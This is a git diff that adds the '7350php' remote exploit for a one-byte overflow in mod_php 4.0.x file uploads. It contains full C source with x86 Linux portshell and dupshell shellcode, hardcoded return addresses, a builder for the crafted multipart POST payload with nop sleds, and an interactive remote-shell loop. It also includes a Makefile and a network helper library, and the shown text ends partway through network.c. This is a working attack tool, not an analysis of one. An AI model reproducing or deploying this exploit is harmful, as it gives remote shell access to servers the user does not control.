summaryrefslogtreecommitdiff
path: root/exploits/7350php
diff options
context:
space:
mode:
Diffstat (limited to 'exploits/7350php')
-rw-r--r--exploits/7350php/7350phpbin0 -> 21909 bytes
-rw-r--r--exploits/7350php/7350php.c376
-rw-r--r--exploits/7350php/Makefile17
-rw-r--r--exploits/7350php/common.c318
-rw-r--r--exploits/7350php/common.h26
-rw-r--r--exploits/7350php/common.obin0 -> 2692 bytes
-rw-r--r--exploits/7350php/network.c918
-rw-r--r--exploits/7350php/network.h367
-rw-r--r--exploits/7350php/network.obin0 -> 8936 bytes
9 files changed, 2022 insertions, 0 deletions
diff --git a/exploits/7350php/7350php b/exploits/7350php/7350php
new file mode 100644
index 0000000..079d6a5
--- /dev/null
+++ b/exploits/7350php/7350php
Binary files differ
diff --git a/exploits/7350php/7350php.c b/exploits/7350php/7350php.c
new file mode 100644
index 0000000..32488b9
--- /dev/null
+++ b/exploits/7350php/7350php.c
@@ -0,0 +1,376 @@
1/* 7350php - x86/linux mod_php v4.0.1-v4.0.3p1 remote exploit
2 *
3 * TESO CONFIDENTIAL - SOURCE MATERIALS
4 *
5 * This is unpublished proprietary source code of TESO Security.
6 *
7 * The contents of these coded instructions, statements and computer
8 * programs may not be disclosed to third parties, copied or duplicated in
9 * any form, in whole or in part, without the prior written permission of
10 * TESO Security. This includes especially the Bugtraq mailing list, the
11 * www.hack.co.za website and any public exploit archive.
12 *
13 * (C) COPYRIGHT TESO Security, 2001
14 * All Rights Reserved
15 *
16 *****************************************************************************
17 * bug found by lorian
18 * exploit by lorian
19 * thanks to scut for his network lib
20 *
21 * this exploits a one byte overflow in the mod_php file upload
22 * handling routine. because apache is a very heavily used daemon
23 * you maybe need several tries with the same offset for the exploit
24 * to work. on my system 2 tries were always enough to get either
25 * a dup- or a portshell. but because of the way apache works you have
26 * unlimited tries anyway.
27 * i have only tested on one system so far but i think the retaddr will
28 * not differ soo much on different installations. because of the
29 * unlimited tried one can maybe bruteforce the retloc.
30 */
31
32#define VERSION "0.0.1"
33
34#include <sys/types.h>
35#include <sys/time.h>
36#include <sys/socket.h>
37#include <netinet/in.h>
38#include <netdb.h>
39#include <errno.h>
40#include <fcntl.h>
41#include <unistd.h>
42#include <stdio.h>
43#include <stdlib.h>
44#include <string.h>
45#include <time.h>
46
47#include "common.h"
48#include "network.h"
49
50int force = 0; /* force exploitation */
51int checkonly = 0; /* check only */
52int targetsys = 0; /* system */
53int portshell = 0; /* create portshell */
54int numtargets; /* number of offsets */
55
56/* data for target 1 */
57int retloc = 0x40284668;
58int retaddr = 0x08101010;
59
60
61void usage (char *progname);
62int xp_check (int fd, char *host);
63void xp (int fd, char *host, char *phpfile);
64void shell (int sock);
65
66/* x86/linux PIC portshell shellcode
67 * by palmers/teso
68 * port 0x5073 (might want to change it here)
69 */
70unsigned char x86_linux_portshell[] =
71 "\x8b\xe5"
72 "\x31\xc0\x99\x50\xfe\xc0\x89\xc3\x50\xfe\xc0\x50"
73 "\x89\xe1\xb0\x66\xcd\x80\x52\x66\x68\x50\x73\x66"
74 "\x52\x89\xe2\x6a\x10\x52\x50\x89\xe1\xfe\xc3\x89"
75 "\xc2\xb0\x66\xcd\x80\x80\xc3\x02\xb0\x66\xcd\x80"
76 "\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc3"
77 "\x31\xc9\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"
78 "\xfe\xc1\xb0\x3f\xcd\x80\xb0\x0b\x99\x52\x68\x6e"
79 "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
80 "\x89\xe1\xcd\x80";
81
82/* x86/linux PIC dupshell shellcode
83 * by lorian/teso
84 */
85unsigned char x86_linux_dupshell[] =
86 "\x8b\xe5"
87 "\x31\xc0\x31\xdb\xb3\x03\x31\xc9\xb0\x3f\xcd\x80"
88 "\xfe\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"
89 "\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
90 "\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
91
92unsigned char * shellcode = x86_linux_dupshell;
93
94/*
95 * Defined Offsets
96 */
97
98typedef struct {
99 unsigned int retloc;
100 unsigned int retaddr;
101 char *system;
102} target;
103
104target targets[] = {
105 { 0x40284668, 0x08101010, "Debian 2.2r3 / Apache 1.3.20 / PHP 4.0.3" },
106 { 0, 0, NULL }
107};
108
109
110void
111usage (char *progname)
112{
113 int i;
114 fprintf (stderr, "usage: %s [options] <hostname> <phpfile>\n\n", progname);
115 fprintf (stderr, "Options:\n -c\t\tcheck exploitability only, do not exploit\n"
116 " -f\t\tforce mode, override check results\n"
117 " -l retloc\tset retlocation\n"
118 " -a retaddr\tset return address\n"
119 " -t target\tchoose target\n");
120 for (i=0; i<numtargets; i++) {
121 fprintf (stderr, "\t\t(%d) %s\n", i+1, targets[i].system);
122 }
123 fprintf (stderr, "\n");
124
125 exit (EXIT_FAILURE);
126}
127
128int
129main (int argc, char *argv[])
130{
131 char c;
132 char * progname;
133 char * dest;
134 char * phpfile;
135 int fd;
136
137 fprintf (stderr, "7350php - x86/linux mod_php v4.0.1-v4.0.3pl1 remote exploit\n"
138 "by lorian.\n\n");
139
140 /* check how many targets we have */
141 numtargets = 0;
142 while (targets[numtargets].system) numtargets++;
143
144 progname = argv[0];
145 if (argc < 3)
146 usage (progname);
147
148 while ((c = getopt (argc, argv, "cfg:t:a:l:p")) != EOF) {
149 switch (c) {
150 case 'c':
151 checkonly = 1;
152 break;
153 case 'f':
154 force = 1;
155 break;
156 case 't':
157 targetsys = (atoi (optarg)-1) % numtargets;
158 retloc = targets[targetsys].retloc;
159 retaddr = targets[targetsys].retaddr;
160 break;
161 case 'a':
162 retaddr = atoi (optarg);
163 break;
164 case 'l':
165 retloc = atoi (optarg);
166 break;
167 case 'p':
168 portshell = 1;
169 shellcode = x86_linux_portshell;
170 break;
171 default:
172 usage (progname);
173 break;
174 }
175 }
176
177 dest = argv[argc - 2];
178 if (dest[0] == '-')
179 usage (progname);
180
181 phpfile = argv[argc - 1];
182 if (phpfile[0] == '-')
183 usage (progname);
184
185
186 fd = net_connect (NULL, dest, 80, NULL, 0, 20);
187 if (fd <= 0) {
188 fprintf (stderr, "failed to connect\n");
189 exit (EXIT_FAILURE);
190 }
191
192 if (xp_check (fd, dest) == 0 && force == 0) {
193 printf ("aborting\n");
194#ifndef DEBUG
195 exit (EXIT_FAILURE);
196#endif
197 }
198 close (fd);
199
200 if (checkonly)
201 exit (EXIT_SUCCESS);
202
203 fd = net_connect (NULL, dest, 80, NULL, 0, 20);
204 if (fd <= 0) {
205 fprintf (stderr, "failed to connect the second time\n");
206 exit (EXIT_FAILURE);
207 }
208
209 srand (time (NULL));
210
211 printf ("\n## sending POST header ...\n");
212
213 xp (fd, dest, phpfile);
214
215 printf ("\n## done ...\n\n");
216
217 if (!portshell) {
218 printf ("## you should be connected to a dup-shell now\n");
219 printf ("## if not simply try again\n");
220 printf ("command> ");
221 fflush (stdout);
222 shell (fd);
223 } else {
224 printf ("## there should be a portshell on port 20595 now\n");
225 printf ("## if not simply try again\n");
226 }
227
228 exit (EXIT_SUCCESS);
229}
230
231
232void
233xp (int fd, char *host, char *phpfile)
234{
235 int i, n;
236 unsigned char *bchars="0123456789abcdef";
237 unsigned char boundary[43];
238 unsigned char buffer[1024*1024];
239 unsigned char *content = buffer;
240 unsigned char namebuf[1024];
241
242 /* construct boundary tag */
243 boundary[40] = '\0';
244 memset (boundary, '-', 29);
245 for (i=27; i<40; i++) boundary[i]=bchars[rand () & 15];
246
247 /* construct namebuffer */
248 memset (namebuf, 0xcc, 109+8*30);
249 namebuf[109+8*30] = '\0';
250 namebuf[108+8*30] = ']';
251 namebuf[8] = '[';
252
253
254 *(int *)&namebuf[8+240+0+1-4] = 0xfffffffc;
255 *(int *)&namebuf[8+240+4+1-4] = 0xfffffffc;
256 *(int *)&namebuf[8+240+8+1-4] = retloc-12;
257 *(int *)&namebuf[8+240+12+1-4] = retaddr;
258
259 /* construct content */
260 content += sprintf (content, "%s\r\n"
261 "Content-Disposition: form-data; name=\"", boundary);
262 memcpy (content, namebuf, 109+8*30);
263 content += 109+8*30;
264 content += sprintf (content, "\"; filename=\"a\"\r\n"
265 "Content-Type: text/plain\r\n\r\n"
266 "Hallo\r\n"
267 "\r\n"
268 "%s\r\n"
269 "Content-Disposition: form-data; name=\"aaaa[a]\"; filename=\"a\"\r\n"
270 "Content-Type: text/plain\r\n\r\n", boundary);
271
272 /* add "jump nops" */
273 for (i=0; i<100000; i++) {
274 *content++ = 0xeb;
275 *content++ = 0x7e;
276 }
277 /* append "nops" */
278 for (i=0; i<150; i++) {
279 *content++ = 0x43;
280 }
281 /* append shellcode */
282 content += sprintf (content, "%s", shellcode);
283
284 /* close with boundary tag */
285 content += sprintf (content, "\r\n"
286 "%s--\r\n", boundary);
287
288 /* construct and send POST header */
289 net_write (fd, "POST /%s HTTP/1.1\r\n"
290 "Host: %s\r\n"
291 "Content-Type: multipart/form-data; boundary=%s\r\n"
292 "Content-Length: %d\r\n"
293 "Connection: Keep-Alive\r\n"
294 "\r\n"
295 ,phpfile, host, boundary+2, content-buffer);
296
297 i = content-buffer;
298 content = buffer;
299 n = send (fd, content, i, 0);
300 while ((n > 0)&&(i > 0)) {
301 content += n;
302 i -= n;
303 n = send (fd, content, i, 0);
304 }
305
306}
307
308
309int
310xp_check (int fd, char *host)
311{
312 int n;
313 unsigned char buf[1024];
314 char *version;
315 int found = 0;
316
317 printf ("## Checking for vulnerable PHP version...\n");
318 net_write (fd, "HEAD / HTTP/1.1\r\n"
319 "Host: %s\r\n"
320 "\r\n", host);
321
322 n = 10;
323 while ((n > 2)&&(!found))
324 {
325 n = net_rlinet (fd, buf, sizeof (buf)-1, 0);
326 if ((strncasecmp (buf, "Server:", 7) == 0) ||
327 (strncasecmp (buf, "X-Powered-By:", 13) == 0))
328 {
329 version = strstr (buf, "PHP/4.0.");
330 if (version) {
331 if ((*(version+8) >= '1') &&
332 (*(version+8) <= '3')) found=1;
333 }
334 }
335 }
336
337 if (found) printf ("## check: PASSED\n");
338 else printf ("## check: FAILED\n");
339
340 return (found);
341}
342
343
344void
345shell (int sock)
346{
347 int l;
348 char buf[512];
349 fd_set rfds;
350
351
352 while (1) {
353 FD_SET (0, &rfds);
354 FD_SET (sock, &rfds);
355
356 select (sock + 1, &rfds, NULL, NULL, NULL);
357 if (FD_ISSET (0, &rfds)) {
358 l = read (0, buf, sizeof (buf));
359 if (l <= 0) {
360 perror ("read user");
361 exit (EXIT_FAILURE);
362 }
363 write (sock, buf, l);
364 }
365
366 if (FD_ISSET (sock, &rfds)) {
367 l = read (sock, buf, sizeof (buf));
368 if (l <= 0) {
369 perror ("read remote");
370 exit (EXIT_FAILURE);
371 }
372 write (1, buf, l);
373 }
374 }
375}
376
diff --git a/exploits/7350php/Makefile b/exploits/7350php/Makefile
new file mode 100644
index 0000000..20e19a4
--- /dev/null
+++ b/exploits/7350php/Makefile
@@ -0,0 +1,17 @@
1
2DFLAGS=-O2
3#DFLAGS= -DDEBUG
4CC=gcc
5CFLAGS=$(DFLAGS) -Wall
6OBJS= common.o network.o
7LIBS=
8
9
10all: 7350php
11
12clean:
13 rm -f *.o 7350php
14
157350php: $(OBJS) 7350php.c
16 $(CC) $(CFLAGS) -o 7350php 7350php.c $(OBJS) $(LIBS)
17
diff --git a/exploits/7350php/common.c b/exploits/7350php/common.c
new file mode 100644
index 0000000..9b28d61
--- /dev/null
+++ b/exploits/7350php/common.c
@@ -0,0 +1,318 @@
1
2#include <sys/time.h>
3#include <netinet/in.h>
4#include <time.h>
5#include <stdarg.h>
6#include <stdio.h>
7#include <string.h>
8#include <stdlib.h>
9#include "common.h"
10
11
12#ifdef DEBUG
13void
14debugp (char *filename, const char *str, ...)
15{
16 FILE *fp; /* temporary file pointer */
17 va_list vl;
18
19 fp = fopen (filename, "a");
20 if (fp == NULL)
21 return;
22
23 va_start (vl, str);
24 vfprintf (fp, str, vl);
25 va_end (vl);
26
27 fclose (fp);
28
29 return;
30}
31
32void
33hexdump (char *filename, unsigned char *data, unsigned int amount)
34{
35 FILE *fp; /* temporary file pointer */
36 unsigned int dp, p; /* data pointer */
37 const char trans[] =
38 "................................ !\"#$%&'()*+,-./0123456789"
39 ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
40 "nopqrstuvwxyz{|}~...................................."
41 "....................................................."
42 "........................................";
43
44 fp = fopen (filename, "a");
45 if (fp == NULL)
46 return;
47
48 fprintf (fp, "\n-packet-\n");
49
50 for (dp = 1; dp <= amount; dp++) {
51 fprintf (fp, "%02x ", data[dp-1]);
52 if ((dp % 8) == 0)
53 fprintf (fp, " ");
54 if ((dp % 16) == 0) {
55 fprintf (fp, "| ");
56 p = dp;
57 for (dp -= 16; dp < p; dp++)
58 fprintf (fp, "%c", trans[data[dp]]);
59 fflush (fp);
60 fprintf (fp, "\n");
61 }
62 fflush (fp);
63 }
64 if ((amount % 16) != 0) {
65 p = dp = 16 - (amount % 16);
66 for (dp = p; dp > 0; dp--) {
67 fprintf (fp, " ");
68 if (((dp % 8) == 0) && (p != 8))
69 fprintf (fp, " ");
70 fflush (fp);
71 }
72 fprintf (fp, " | ");
73 for (dp = (amount - (16 - p)); dp < amount; dp++)
74 fprintf (fp, "%c", trans[data[dp]]);
75 fflush (fp);
76 }
77 fprintf (fp, "\n");
78
79 fclose (fp);
80 return;
81}
82
83#endif
84
85
86/* m_random
87 *
88 * return a random number between `lowmark' and `highmark'
89 */
90
91int
92m_random (int lowmark, int highmark)
93{
94 long int rnd;
95
96 /* flip/swap them in case user messed up
97 */
98 if (lowmark > highmark) {
99 lowmark ^= highmark;
100 highmark ^= lowmark;
101 lowmark ^= highmark;
102 }
103 rnd = lowmark;
104
105 rnd += (random () % (highmark - lowmark));
106
107 /* this is lame, i know :)
108 */
109 return (rnd);
110}
111
112
113/* set_tv
114 *
115 * initializes a struct timeval pointed to by `tv' to a second value of
116 * `seconds'
117 *
118 * return in any case
119 */
120
121void
122set_tv (struct timeval *tv, int seconds)
123{
124 tv->tv_sec = seconds;
125 tv->tv_usec = 0;
126
127 return;
128}
129
130
131/* xstrupper
132 *
133 * uppercase a string `str'
134 *
135 * return in any case
136 */
137
138void
139xstrupper (char *str)
140{
141 for (; *str != '\0'; ++str) {
142 if (*str >= 'a' && *str <= 'z') {
143 *str -= ('a' - 'A');
144 }
145 }
146
147 return;
148}
149
150
151/* concating snprintf
152 *
153 * determines the length of the string pointed to by `os', appending formatted
154 * string to a maximium length of `len'.
155 *
156 */
157
158void
159scnprintf (char *os, size_t len, const char *str, ...)
160{
161 va_list vl;
162 char *ostmp = os + strlen (os);
163
164 va_start (vl, str);
165 vsnprintf (ostmp, len - strlen (os) - 1, str, vl);
166 va_end (vl);
167
168 return;
169}
170
171
172unsigned long int
173tdiff (struct timeval *old, struct timeval *new)
174{
175 unsigned long int time1;
176
177 if (new->tv_sec >= old->tv_sec) {
178 time1 = new->tv_sec - old->tv_sec;
179 if ((new->tv_usec - 500000) >= old->tv_usec)
180 time1++;
181 } else {
182 time1 = old->tv_sec - new->tv_sec;
183 if ((old->tv_usec - 500000) >= new->tv_usec)
184 time1++;
185 }
186
187 return (time1);
188}
189
190
191/* ipv4_print
192 *
193 * padding = 0 -> don't padd
194 * padding = 1 -> padd with zeros
195 * padding = 2 -> padd with spaces
196 */
197
198char *
199ipv4_print (char *dest, struct in_addr in, int padding)
200{
201 unsigned char *ipp;
202
203 ipp = (unsigned char *) &in.s_addr;
204
205 strcpy (dest, "");
206
207 switch (padding) {
208 case (0):
209 sprintf (dest, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
210 break;
211 case (1):
212 sprintf (dest, "%03d.%03d.%03d.%03d", ipp[0], ipp[1], ipp[2], ipp[3]);
213 break;
214 case (2):
215 sprintf (dest, "%3d.%3d.%3d.%3d", ipp[0], ipp[1], ipp[2], ipp[3]);
216 break;
217 default:
218 break;
219 }
220
221 return (dest);
222}
223
224
225void *
226xrealloc (void *m_ptr, size_t newsize)
227{
228 void *n_ptr;
229
230 n_ptr = realloc (m_ptr, newsize);
231 if (n_ptr == NULL) {
232 fprintf (stderr, "realloc failed\n");
233 exit (EXIT_FAILURE);
234 }
235
236 return (n_ptr);
237}
238
239
240char *
241xstrdup (char *str)
242{
243 char *b;
244
245 b = strdup (str);
246 if (b == NULL) {
247 fprintf (stderr, "strdup failed\n");
248 exit (EXIT_FAILURE);
249 }
250
251 return (b);
252}
253
254
255void *
256xcalloc (int factor, size_t size)
257{
258 void *bla;
259
260 bla = calloc (factor, size);
261
262 if (bla == NULL) {
263 fprintf (stderr, "no memory left\n");
264 exit (EXIT_FAILURE);
265 }
266
267 return (bla);
268}
269
270
271/* source by dk
272 */
273
274char *
275allocncat (char **to, char *from, size_t len)
276{
277 int rlen = strlen (from);
278 int null = *to == NULL;
279
280 len = rlen < len ? rlen : len;
281 *to = realloc (*to, (null ? 0 : strlen (*to)) + len + 1);
282 if (null)
283 **to = '\0';
284
285 if (*to == NULL)
286 perror ("no memory: ");
287
288 return (strncat (*to, from, len));
289}
290
291
292char *
293alloccat (char **to, char *from)
294{
295 return (allocncat (to, from, strlen (from)));
296}
297
298
299char *
300ip_get_random (void)
301{
302 char *ip = xcalloc (1, 17);
303 int i[4];
304
305 for (;;) {
306 i[0] = m_random (1, 239);
307 if (i[0] != 10 && i[0] != 127 && i[0] != 192)
308 break;
309 }
310 i[1] = m_random (1, 254);
311 i[2] = m_random (1, 254);
312 i[3] = m_random (1, 254);
313
314 sprintf (ip, "%d.%d.%d.%d", i[0], i[1], i[2], i[3]);
315
316 return (ip);
317}
318
diff --git a/exploits/7350php/common.h b/exploits/7350php/common.h
new file mode 100644
index 0000000..dc7b666
--- /dev/null
+++ b/exploits/7350php/common.h
@@ -0,0 +1,26 @@
1
2#ifndef Z_COMMON_H
3#define Z_COMMON_H
4
5#include <sys/time.h>
6#include <netinet/in.h>
7
8#ifdef DEBUG
9void debugp (char *filename, const char *str, ...);
10void hexdump (char *filename, unsigned char *data, unsigned int amount);
11#endif
12int m_random (int lowmark, int highmark);
13void set_tv (struct timeval *tv, int seconds);
14void xstrupper (char *str);
15void scnprintf (char *os, size_t len, const char *str, ...);
16unsigned long int tdiff (struct timeval *old, struct timeval *new);
17char *ipv4_print (char *dest, struct in_addr in, int padding);
18void *xrealloc (void *m_ptr, size_t newsize);
19char *xstrdup (char *str);
20void *xcalloc (int factor, size_t size);
21char *allocncat (char **to, char *from, size_t len);
22char *alloccat (char **to, char *from);
23char *ip_get_random (void);
24
25#endif
26
diff --git a/exploits/7350php/common.o b/exploits/7350php/common.o
new file mode 100644
index 0000000..dd5a0fc
--- /dev/null
+++ b/exploits/7350php/common.o
Binary files differ
diff --git a/exploits/7350php/network.c b/exploits/7350php/network.c
new file mode 100644
index 0000000..71d4a21
--- /dev/null
+++ b/exploits/7350php/network.c
@@ -0,0 +1,918 @@
1
2/* scut's leet network library ;)
3 * 1999 (c) scut
4 *
5 * networking routines
6 * based on my hbot networking sources,
7 * revised, extended and adapted 990405
8 * extended, improved and fixed 990430
9 *
10 * nearly all of this code wouldn't have been possible without w. richard stevens
11 * excellent network coding book. if you are interested in network coding,
12 * there is no way around it.
13 */
14
15#include <sys/types.h>
16#include <sys/ioctl.h>
17#include <sys/socket.h>
18#include <sys/time.h>
19#include <netinet/in.h>
20#include <arpa/inet.h>
21#include <netdb.h>
22#include <net/if.h>
23#include <errno.h>
24#include <fcntl.h>
25#include <stdarg.h>
26#include <stdio.h>
27#include <stdlib.h>
28#include <string.h>
29#include <unistd.h>
30#include "network.h"
31
32int net_readtimeout = NET_READTIMEOUT;
33int net_conntimeout = NET_CONNTIMEOUT;
34int net_identtimeout = NET_IDENTTIMEOUT;
35
36
37int
38net_socks_connect (char *socks, unsigned short int sport, char *server, unsigned short int port, int sec)
39{
40 int s5s;
41 struct sockaddr_in cs;
42
43 s5s = net_connect (&cs, socks, sport, NULL, 0, sec);
44 if (s5s == -1)
45 return (-1);
46
47 if (net_socks_put_s5info (s5s, server, port, sec) == -1) {
48 close (s5s);
49 return (-1);
50 }
51 return (s5s);
52}
53
54
55int
56net_socks_put_s5info (int s5s, char *server, unsigned short int port, int sec)
57{
58 int n;
59 char buff[1024];
60
61 /* v5 + noauth */
62 net_write (s5s, "\x05\x01%c", 0);
63 if (net_rtimeout (s5s, sec) == -1)
64 return (-1);
65 recv (s5s, buff, sizeof (buff), 0);
66
67 /* chain us =) */
68 net_write (s5s, "\x05\x01%c\x03%c%s%c%c", 0, strlen (server), server, (port >> 8) & 0xff, port & 0xff);
69 if (net_rtimeout (s5s, sec) == -1)
70 return (-1);
71 n = recv (s5s, buff, sizeof (buff), 0);
72 if (buff[1] != 0x00) {
73 return (-1);
74 }
75 return (1);
76}
77
78
79int
80net_parseip (char *inp, char **ip, unsigned short int *port)
81{
82 int n;
83
84 if (inp == NULL)
85 return (0);
86 if (strchr (inp, ':') == NULL)
87 return (0);
88
89 *ip = calloc (1, 256);
90 if (*ip == NULL)
91 return (0);
92
93 n = sscanf (inp, "%[^:]:%hu", *ip, port);
94 if (n != 2)
95 return (0);
96
97 *ip = realloc (*ip, strlen (*ip) + 1);
98 if (*ip == NULL || (*port < 1 || *port > 65535))
99 return (0);
100
101 return (1);
102}
103
104
105char *
106net_getlocalip (void)
107{
108 struct sockaddr_in pf;
109 char name[255];
110
111 memset (name, '\0', sizeof (name));
112
113 if (gethostname (name, sizeof (name) - 1) == -1) {
114 return (NULL);
115 }
116
117 pf.sin_addr.s_addr = net_resolve (name);
118
119 return (strdup (inet_ntoa (pf.sin_addr)));;
120}
121
122
123char *
124net_peeraddress (int socket)
125{
126 char * hip;
127 struct sockaddr_in peeraddr;
128 size_t size = sizeof (struct sockaddr_in);
129
130 if (getpeername (socket, (struct sockaddr *) &peeraddr, &size) == -1)
131 return (NULL);
132
133 net_printipa (&peeraddr.sin_addr, &hip);
134
135 return (hip);
136}
137
138
139int
140net_addrpair (int socket, struct in_addr *src_ip, unsigned short int *src_prt,
141 struct in_addr *dst_ip, unsigned short int *dst_prt)
142{
143 size_t size = sizeof (struct sockaddr_in);
144 struct sockaddr_in addr;
145
146
147 if (getsockname (socket, (struct sockaddr *) &addr, &size) == -1)
148 return (1);
149
150 src_ip->s_addr = addr.sin_addr.s_addr;
151 *src_prt = ntohs (addr.sin_port);
152
153 if (getpeername (socket, (struct sockaddr *) &addr, &size) == -1)
154 return (1);
155
156 dst_ip->s_addr = addr.sin_addr.s_addr;
157 *dst_prt = ntohs (addr.sin_port);
158
159 return (0);
160}
161
162
163char *
164net_peername (int socket)
165{
166 struct sockaddr_in peeraddr;
167 struct hostent he, *hep;
168 size_t size = sizeof (struct sockaddr_in);
169 int n, h_errno;
170 unsigned char h_buf[8192];
171
172 if (getpeername (socket, (struct sockaddr *) &peeraddr, &size) == -1)
173 return (NULL);
174
175 /* digital unix / hp-ux freaks mod here =)
176 */
177 n = gethostbyaddr_r ((char *) &peeraddr.sin_addr, sizeof (struct in_addr),
178 AF_INET, &he, h_buf, sizeof (h_buf), &hep, &h_errno);
179
180 if (hep == NULL) {
181 char *ip_str = NULL;
182
183 net_printipa (&peeraddr.sin_addr, &ip_str);
184 return (ip_str);
185 }
186
187 return (strdup (he.h_name));
188}
189
190
191FILE *
192net_descriptify (int socket)
193{
194 FILE *fp;
195
196 fp = fdopen (socket, "r+");
197 return ((fp == NULL) ? (NULL) : (fp));
198}
199
200
201/* loosely based on rfc931.c */
202
203int
204net_ident (char **ident, struct sockaddr_in *locals, unsigned short int localport,
205 struct sockaddr_in *remotes, unsigned short int remoteport)
206{
207 int is; /* ident socket */
208 struct sockaddr_in isa;
209 int n;
210 char identreply[512], *cp;
211 unsigned int rmt_port, our_port;
212
213
214 *ident = NULL;
215
216 is = net_connect (&isa, inet_ntoa (remotes->sin_addr), 113, NULL, 0, net_identtimeout);
217 if (is == -1)
218 return (-1);
219
220 /* ident request */
221 net_write (is, "%u,%u\r\n", remoteport, localport);
222 memset (identreply, '\0', sizeof (identreply));
223
224 n = net_rlinet (is, identreply, sizeof(identreply) -1, net_identtimeout);
225 if (n == -1) {
226 close (is);
227 return (-1);
228 }
229 close (is);
230
231 *ident = calloc (1, 256);
232#ifdef DEBUG
233 printf("%s\n", identreply);
234#endif
235 n = sscanf (identreply, "%u , %u : USERID :%*[^:]:%255s", &rmt_port, &our_port, *ident);
236 if (n != 3) {
237 free (*ident);
238 *ident = NULL;
239 return (-1);
240 }
241
242 /* check the ports 'man */
243 if ((rmt_port != remoteport) || (our_port != localport)) {
244 free (*ident);
245 *ident = NULL;
246 return (-1);
247 }
248
249 /* strip character and save some memory */
250 if ((cp = strchr (*ident, '\r')))
251 *cp = '\0';
252 n = strlen (*ident);
253 *ident = realloc (*ident, n + 1);
254 (*ident)[n] = '\0';
255
256#ifdef DEBUG
257 printf("ident-return: %s\n", *ident);
258#endif
259 return (1);
260}
261
262
263int
264net_accept (int s, struct sockaddr_in *cs, int maxsec)
265{
266 int flags, n;
267 fd_set ac_s;
268 int len;
269 struct timeval tval;
270 struct sockaddr_in csa;
271
272 if (cs == NULL)
273 cs = &csa;
274
275 flags = fcntl(s, F_GETFL, 0);
276 if (flags == -1)
277 return (-1);
278 n = fcntl(s, F_SETFL, flags | O_NONBLOCK);
279 if (n == -1)
280 return (-1);
281
282 FD_ZERO(&ac_s);
283 FD_SET(s, &ac_s);
284 tval.tv_sec = maxsec;
285 tval.tv_usec = 0;
286
287 n = select(s + 1, &ac_s, NULL, NULL, maxsec ? &tval : NULL);
288 if (n == 0)
289 return (0);
290
291 if (FD_ISSET(s, &ac_s)) {
292 len = sizeof(struct sockaddr_in);
293 n = accept(s, (struct sockaddr *) cs, &len);
294 if (n == -1) {
295 switch (errno) {
296 case EWOULDBLOCK:
297 case ECONNABORTED:
298 case EPROTO:
299 case EINTR: if (fcntl(s, F_SETFL, flags) == -1)
300 return (-1);
301 return (0);
302 default: return (-1);
303 }
304 }
305 if (fcntl(s, F_SETFL, flags) == -1)
306 return (-1);
307 return (n);
308 }
309 if (fcntl(s, F_SETFL, flags) == -1)
310 return (-1);
311 return (0);
312}
313
314
315int
316net_testvip (char *ip)
317{
318 struct ifi_info *ifi, *ifc;
319 struct in_addr ip_n;
320
321 if (ip == NULL)
322 return (1);
323 if (strcmp(ip, "*") == 0)
324 return (1);
325
326 ip_n.s_addr = net_resolve(ip);
327 if (!(ip_n.s_addr))
328 return (0);
329
330 ifi = net_ifi_get (AF_INET, 1);
331 if (ifi == NULL)
332 return (0);
333 for (ifc = ifi; ifc != NULL; ifc = ifc->ifi_next) {
334 if (memcmp (&ip_n.s_addr, &ifc->ifi_saddr.s_addr, sizeof (struct in_addr)) == 0) {
335 net_ifi_free(ifi);
336 return (1);
337 }
338 }
339 net_ifi_free(ifi);
340 return (0);
341}
342
343
344void
345net_ifi_free (struct ifi_info *tf)
346{
347 struct ifi_info *ifi, *ifil;
348
349 ifil = NULL;
350 for (ifi = tf; ifi != NULL; ifi = ifi->ifi_next) {
351 if (ifil)
352 free (ifil);
353 if (ifi->ifi_addr)
354 free (ifi->ifi_addr);
355 ifil = ifi;
356 }
357 if (ifil)
358 free (ifil);
359 return;
360}
361
362
363struct ifi_info *
364net_ifi_get (int family, int doaliases)
365{
366 struct ifi_info *ifi, *ifihead, **ifipnext;
367 int sockfd, len, lastlen, flags, myflags;
368 char *ptr, *buf, lastname[IFNAMSIZ], *cptr;
369 struct ifconf ifc;
370 struct ifreq *ifr, ifrcopy;
371 struct sockaddr_in *sinptr;
372
373 sockfd = socket(AF_INET, SOCK_DGRAM, 0);
374 if (sockfd == -1)
375 return (NULL);
376
377 lastlen = 0;
378 len = 100 * sizeof(struct ifreq);
379 for (;;) {
380 buf = malloc(len);
381 if (buf == NULL)
382 return (NULL);
383 ifc.ifc_len = len;
384 ifc.ifc_buf = buf;
385 if (ioctl(sockfd, SIOCGIFCONF, &ifc) < 0) {
386 if (errno != EINVAL || lastlen != 0)
387 return (NULL);
388 } else {
389 if (ifc.ifc_len == lastlen)
390 break;
391 lastlen = ifc.ifc_len;
392 }
393 len += 10 * sizeof(struct ifreq);
394 free (buf);
395 }
396 ifihead = NULL;
397 ifipnext = &ifihead;
398 lastname[0] = 0;
399
400 for (ptr = buf; ptr < buf + ifc.ifc_len;) {
401 ifr = (struct ifreq *) ptr;
402 if (ifr->ifr_addr.sa_family == AF_INET)
403 len = sizeof(struct sockaddr);
404 ptr += sizeof(ifr->ifr_name) + len;
405
406 if (ifr->ifr_addr.sa_family != family)
407 continue;
408 myflags = 0;
409 if ((cptr = strchr(ifr->ifr_name, ':')) != NULL)
410 *cptr = 0;
411 if (strncmp(lastname, ifr->ifr_name, IFNAMSIZ) == 0) {
412 if (doaliases == 0)
413 continue;
414 myflags = IFI_ALIAS;
415 }
416 memcpy(lastname, ifr->ifr_name, IFNAMSIZ);
417
418 ifrcopy = *ifr;
419 if (ioctl(sockfd, SIOCGIFFLAGS, &ifrcopy) < 0)
420 return (NULL);
421 flags = ifrcopy.ifr_flags;
422 if ((flags & IFF_UP) == 0)
423 continue;
424
425 ifi = calloc(1, sizeof(struct ifi_info));
426 if (ifi == NULL)
427 return (NULL);
428 *ifipnext = ifi;
429 ifipnext = &ifi->ifi_next;
430 ifi->ifi_flags = flags;
431 ifi->ifi_myflags = myflags;
432 memcpy(ifi->ifi_name, ifr->ifr_name, IFI_NAME);
